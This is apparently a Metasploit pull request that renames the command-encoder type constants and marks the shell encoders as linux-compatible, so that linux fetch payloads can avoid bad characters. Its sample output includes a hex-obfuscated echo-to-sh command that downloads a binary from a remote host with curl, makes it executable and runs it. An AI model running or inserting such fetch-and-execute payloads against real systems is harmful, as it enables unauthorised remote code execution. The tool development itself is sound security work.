### PR TITLE
Mark unix encoders as compatible with linux

### DIFF
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -129,19 +129,19 @@ class Encoder < Module
     #
     # perl encoding.
     #
-    CmdUnixPerl = 'perl'
+    CmdPosixPerl = 'perl'
     #
     # Bourne shell echo encoding.
     #
-    CmdUnixEcho = 'echo'
+    CmdPosixEcho = 'echo'
     #
     # Bourne shell ${IFS} encoding.
     #
-    CmdUnixIFS = 'ifs'
+    CmdPosixIFS = 'ifs'
     #
     # Bash brace expansion encoding.
     #
-    CmdUnixBrace = 'brace'
+    CmdPosixBrace = 'brace'
   end
 
   #

--- a/modules/encoders/cmd/brace.rb
+++ b/modules/encoders/cmd/brace.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Encoder
         to avoid whitespace without being overly fancy.
       },
       'Author'      => ['wvu', 'egypt'],
-      'Platform'    => 'unix',
+      'Platform'    => %w[ linux unix ],
       'Arch'        => ARCH_CMD,
-      'EncoderType' => Msf::Encoder::Type::CmdUnixBrace
+      'EncoderType' => Msf::Encoder::Type::CmdPosixBrace
     )
   end
 

--- a/modules/encoders/cmd/echo.rb
+++ b/modules/encoders/cmd/echo.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Encoder
       },
       'Author'           => 'hdm',
       'Arch'             => ARCH_CMD,
-      'Platform'         => 'unix',
-      'EncoderType'      => Msf::Encoder::Type::CmdUnixEcho)
+      'Platform'         => %w[ linux unix ],
+      'EncoderType'      => Msf::Encoder::Type::CmdPosixEcho)
   end
 
 

--- a/modules/encoders/cmd/ifs.rb
+++ b/modules/encoders/cmd/ifs.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Encoder
         without being overly fancy.
       },
       'Author'      => ['egypt', 'wvu'],
-      'Platform'    => 'unix',
+      'Platform'    => %w[ linux unix ],
       'Arch'        => ARCH_CMD,
-      'EncoderType' => Msf::Encoder::Type::CmdUnixIFS
+      'EncoderType' => Msf::Encoder::Type::CmdPosixIFS
     )
   end
 

--- a/modules/encoders/cmd/perl.rb
+++ b/modules/encoders/cmd/perl.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Encoder
       },
       'Author'           => 'hdm',
       'Arch'             => ARCH_CMD,
-      'Platform'         => 'unix',
-      'EncoderType'      => Msf::Encoder::Type::CmdUnixPerl)
+      'Platform'         => %w[ linux unix ],
+      'EncoderType'      => Msf::Encoder::Type::CmdPosixPerl)
   end
 
 

--- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
+++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Payload'  =>
                 {
                   'Space'       => 466,
-                  'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
+                  'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
                   'Compat'      =>
                     {
                       'PayloadType' => 'cmd',

--- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space'       => 2000,
           'BadChars'    => "\x00",
           'DisableNops' => true,
-          'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
+          'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
           'Compat'      =>
             {
               'PayloadType' => 'cmd',


### PR DESCRIPTION
Fixes #18572 by marking the existing unix encoders as also being compatible with linux.  There are currently no encoder modules that are marked as compatible with linux so when an exploit author intends to use the new fetch payloads, they can't set the bad characters in the payload hash of the module.

## Verification

- [ ] Start `msfconsole`
- [ ] `use payload/cmd/linux/http/x64/meterpreter/reverse_tcp` or one of the other *linux* payload modules
- [ ] Generate the payload with at least one bad character and see that an encoder is automatically selected and used instead of receiving an error

## New and fixed
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
/bin/echo${IFS}-ne${IFS}'\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x39\x2e\x31\x32\x38\x3a\x38\x30\x38\x30\x2f\x6a\x76\x45\x5f\x67\x6a\x44\x4b\x78\x75\x51\x6f\x38\x36\x2d\x39\x31\x54\x69\x74\x4e\x51\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x3b\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x26'|sh
```

## Old and broken
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
[-] Payload generation failed: cmd/linux/http/x64/meterpreter/reverse_tcp: All encoders failed to encode.
```